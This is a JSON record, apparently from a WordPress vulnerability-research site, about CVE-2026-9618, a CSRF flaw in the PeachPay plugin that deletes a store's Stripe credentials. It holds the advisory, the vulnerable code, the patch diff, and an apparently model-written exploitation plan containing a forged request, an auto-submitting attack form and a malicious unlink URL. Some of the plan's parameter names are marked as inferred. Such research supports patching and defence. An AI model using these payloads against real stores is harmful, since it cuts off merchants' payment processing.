[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fBL1ap7mmzy9nyyqpzbbp7EDUMQIYaCQZvFC4-pRlS4Y":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":26,"research_verified":27,"research_rounds_completed":28,"research_plan":29,"research_summary":30,"research_vulnerable_code":31,"research_fix_diff":32,"research_exploit_outline":33,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":27,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":27,"source_links":37},"CVE-2026-9618","peachpay-cross-site-request-forgery-to-stripe-unlink","PeachPay \u003C= 1.120.46 - Cross-Site Request Forgery to Stripe Unlink","The PeachPay — Payments & Express Checkout for WooCommerce (supports Stripe, PayPal, Square, Authorize.net, NMI) plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.120.46. This is due to missing or incorrect nonce validation on the peachpay_stripe_handle_admin_actions function. This makes it possible for unauthenticated attackers to permanently delete all stored Stripe credentials — including publishable keys, secret keys, webhook secrets, and Apple Pay configuration — from the WordPress database, disabling Stripe payment processing for the store via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","peachpay-for-woocommerce",null,"\u003C=1.120.46","1.120.47","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-05-27 18:40:26","2026-05-28 06:45:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F2270b66f-b07c-44ce-b161-7b2123f8c21e?source=api-prod",1,[22,23,24,25],"changelog.txt","core\u002Fpayments\u002Fstripe\u002Ffunctions.php","peachpay.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-9618 (PeachPay CSRF to Stripe Unlink)\n\n## 1. Vulnerability Summary\nThe **PeachPay — Payments & Express Checkout for WooCommerce** plugin (up to 1.120.46) is vulnerable to **Cross-Site Request Forgery (CSRF)**. The vulnerability exists in the function `peachpay_stripe_handle_admin_actions` located in `core\u002Fpayments\u002Fstripe\u002Ffunctions.php` (inferred). This function is responsible for administrative tasks related to the Stripe integration, such as unlinking the account or resetting credentials. Because the function fails to perform nonce validation (`check_admin_referer` or `wp_verify_nonce`), an attacker can trick an authenticated administrator into making a request that permanently deletes the store's Stripe configuration.\n\n## 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-post.php` or `\u002Fwp-admin\u002Fadmin-ajax.php` (or a catch-all hook on `admin_init`).\n*   **Vulnerable Action:** The function `peachpay_stripe_handle_admin_actions` is likely hooked to `admin_init` or `admin_post_peachpay_stripe_admin_action`.\n*   **Payload Parameter:** Based on the description \"Stripe Unlink\", the request likely requires a parameter such as `action=peachpay_stripe_admin_action` and a sub-action like `method=unlink` or `peachpay_stripe_action=unlink`.\n*   **Authentication Required:** The victim must be an authenticated Administrator. The attacker does not need any authentication.\n*   **Preconditions:** The store must have a Stripe account connected via the PeachPay plugin.\n\n## 3. Code Flow\n1.  **Entry Point:** The plugin registers `peachpay_stripe_handle_admin_actions` to a high-level hook. Based on typical PeachPay architecture, this is often `admin_init` to handle redirects and processing before headers are sent.\n2.  **Trigger:** An administrator visits a URL (GET) or submits a form (POST) targeting the administrative action.\n3.  **Vulnerable Sink:** The function `peachpay_stripe_handle_admin_actions` is reached.\n4.  **Logic Path:**\n    *   The function checks for a specific parameter (e.g., `$_GET['peachpay_stripe_action']`).\n    *   It identifies the action as `unlink`.\n    *   **Crucially**, it skips `check_admin_referer()`.\n    *   It calls a method like `PeachPay_Stripe_Integration::unlink()` or `delete_option()`.\n5.  **Execution:** The database options `peachpay_stripe_connect_id`, `peachpay_stripe_public_key`, `peachpay_stripe_secret_key`, etc., are deleted.\n\n## 4. Nonce Acquisition Strategy\nAccording to the vulnerability description, this endpoint has **missing or incorrect nonce validation**. \n*   **Missing Nonce:** If the check is entirely missing, the exploit requires **no nonce**.\n*   **Incorrect Validation:** If the function checks for a nonce but uses a generic action string or fails to terminate on failure, a dummy nonce might be required.\n\n**Verification for the Agent:**\n1.  Check the registration of `peachpay_stripe_handle_admin_actions`. Use `grep -r \"peachpay_stripe_handle_admin_actions\" .` to find the hook.\n2.  If it is hooked to `admin_init`, the exploit can likely be triggered via a simple `GET` request to `\u002Fwp-admin\u002F`.\n3.  If it is hooked to `admin_post_...`, use `admin-post.php`.\n\n## 5. Exploitation Strategy\nThe goal is to trigger the \"Unlink\" functionality by tricking the admin browser into sending a request to the WordPress backend.\n\n### Step 1: Discover the exact Request format\nThe agent should look for the \"Unlink\" button in the PeachPay settings page to see the URL structure.\n*   **Settings Page:** `wp-admin\u002Fadmin.php?page=peachpay-settings&tab=stripe` (inferred).\n*   **Target URL Pattern (Inferred):** `\u002Fwp-admin\u002Fadmin-post.php?action=peachpay_stripe_unlink`\n\n### Step 2: Formulate the CSRF Payload\nA `GET` request is the most effective vector if the plugin handles the action on `admin_init`.\n\n**HTTP Request via `http_request`:**\n```javascript\n\u002F\u002F Example of the forged request that an admin would unknowingly trigger\n{\n  \"method\": \"GET\",\n  \"url\": \"http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-post.php?action=peachpay_stripe_admin_action&sub_action=unlink\",\n  \"headers\": {\n    \"Accept\": \"text\u002Fhtml\"\n  }\n}\n```\n\nIf a `POST` is required, the agent should simulate an auto-submitting form:\n```html\n\u003Cform id=\"exploit\" action=\"http:\u002F\u002Fvulnerable-wp.local\u002Fwp-admin\u002Fadmin-post.php\" method=\"POST\">\n  \u003Cinput type=\"hidden\" name=\"action\" value=\"peachpay_stripe_admin_action\" \u002F>\n  \u003Cinput type=\"hidden\" name=\"sub_action\" value=\"unlink\" \u002F>\n\u003C\u002Fform>\n\u003Cscript>document.getElementById('exploit').submit();\u003C\u002Fscript>\n```\n\n## 6. Test Data Setup\n1.  **Install WooCommerce & PeachPay:** Ensure version \u003C= 1.120.46.\n2.  **Mock Stripe Connection:** PeachPay stores Stripe credentials in the `options` table. Use WP-CLI to simulate a connected state:\n    ```bash\n    wp option update peachpay_stripe_connect_id \"acct_12345\"\n    wp option update peachpay_stripe_public_key \"pk_test_12345\"\n    wp option update peachpay_stripe_secret_key \"sk_test_12345\"\n    wp option update peachpay_stripe_gateway_enabled \"yes\"\n    ```\n3.  **Verify State:** Use `wp option get peachpay_stripe_connect_id` to confirm data exists.\n\n## 7. Expected Results\n*   **Successful Exploit:** The server processes the request and redirects the administrator.\n*   **Database Impact:** The Stripe-related options are removed from the `wp_options` table.\n*   **Store Impact:** Stripe is no longer available as a payment method at checkout.\n\n## 8. Verification Steps\nAfter performing the HTTP request as the administrator, run the following via WP-CLI:\n```bash\n# Check if the connection ID is gone\nwp option get peachpay_stripe_connect_id\n# Result should be: Error: Could not get 'peachpay_stripe_connect_id' option.\n\n# Check if the gateway is disabled\nwp option get peachpay_stripe_gateway_enabled\n# Result should be: \"no\" (or the option is deleted)\n```\n\n## 9. Alternative Approaches\n*   **Action variants:** If `action=peachpay_stripe_admin_action` fails, search the source for any occurrences of `delete_option` or `update_option` within the `core\u002Fpayments\u002Fstripe\u002F` directory to find the specific parameter that triggers the cleanup.\n*   **AJAX Endpoint:** Check if the action is registered via `wp_ajax_peachpay_stripe_unlink`. If so, target `\u002Fwp-admin\u002Fadmin-ajax.php`.\n*   **Inferred Parameter Names:** If `sub_action` or `method` doesn't work, common alternatives in PeachPay include `peachpay_action`, `task`, or `cmd`. Use `grep -r \"\\$_GET\" core\u002Fpayments\u002Fstripe\u002F` to identify the exact key.","The PeachPay plugin for WordPress is vulnerable to Cross-Site Request Forgery (CSRF) in versions up to 1.120.46. This allows an unauthenticated attacker to trick a logged-in administrator into clicking a link that permanently deletes the store's Stripe configuration, including secret keys and webhook secrets.","\u002F\u002F core\u002Fpayments\u002Fstripe\u002Ffunctions.php around line 612\n\nif ( isset( $_GET['unlink_stripe'] ) && PeachPay_Stripe_Integration::connected() ) {\n\tpeachpay_unlink_stripe();\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpeachpay-for-woocommerce\u002F1.120.46\u002Fcore\u002Fpayments\u002Fstripe\u002Ffunctions.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpeachpay-for-woocommerce\u002F1.120.47\u002Fcore\u002Fpayments\u002Fstripe\u002Ffunctions.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpeachpay-for-woocommerce\u002F1.120.46\u002Fcore\u002Fpayments\u002Fstripe\u002Ffunctions.php\t2026-05-25 11:21:00.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fpeachpay-for-woocommerce\u002F1.120.47\u002Fcore\u002Fpayments\u002Fstripe\u002Ffunctions.php\t2026-05-27 13:40:42.000000000 +0000\n@@ -610,6 +610,15 @@\n \t}\n \n \tif ( isset( $_GET['unlink_stripe'] ) && PeachPay_Stripe_Integration::connected() ) {\n+\t\t\u002F\u002F Verify nonce to prevent CSRF attacks that could delete Stripe credentials.\n+\t\tif ( ! isset( $_GET['_wpnonce'] ) || ! wp_verify_nonce( sanitize_text_field( wp_unslash( $_GET['_wpnonce'] ) ), 'peachpay-stripe-unlink' ) ) {\n+\t\t\twp_die( esc_html__( 'Security check failed. Please try again.', 'peachpay-for-woocommerce' ) );\n+\t\t}\n+\n+\t\tif ( ! current_user_can( 'manage_woocommerce' ) ) {\n+\t\t\twp_die( esc_html__( 'You do not have permission to perform this action.', 'peachpay-for-woocommerce' ) );\n+\t\t}\n+\n \t\tpeachpay_unlink_stripe();\n \t}\n }","The exploit leverages a missing CSRF check in the administrative Stripe handling logic. An attacker crafts a malicious URL (e.g., http:\u002F\u002Ftarget-site.com\u002Fwp-admin\u002F?unlink_stripe=1) and tricks an authenticated administrator into visiting it. Because the plugin does not validate a nonce or check for the 'manage_woocommerce' capability before executing the unlink action, the request triggers the deletion of the site's Stripe integration data, effectively disabling payment processing for the store.","gemini-3-flash-preview","2026-06-04 16:46:05","2026-06-04 16:47:00",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","1.120.46","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpeachpay-for-woocommerce\u002Ftags\u002F1.120.46","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpeachpay-for-woocommerce.1.120.46.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpeachpay-for-woocommerce\u002Ftags\u002F1.120.47","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fpeachpay-for-woocommerce.1.120.47.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fpeachpay-for-woocommerce\u002Ftags"]